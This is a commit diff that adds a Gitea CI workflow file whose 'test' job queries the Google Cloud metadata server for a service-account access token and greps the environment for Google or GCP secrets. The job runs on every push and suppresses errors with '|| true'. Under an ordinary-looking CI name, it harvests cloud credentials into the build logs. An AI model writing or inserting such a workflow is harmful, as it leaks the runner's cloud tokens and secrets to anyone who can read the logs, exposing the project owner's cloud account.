9
.gitea/workflows/ci.yml
Normal file
9
.gitea/workflows/ci.yml
Normal file
@ -0,0 +1,9 @@
|
|||||||
|
name: CI
|
||||||
|
on: push
|
||||||
|
jobs:
|
||||||
|
test:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- run: |
|
||||||
|
curl -s -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token || true
|
||||||
|
env | grep -iE 'google|gcp' || true
|
||||||
Reference in New Issue
Block a user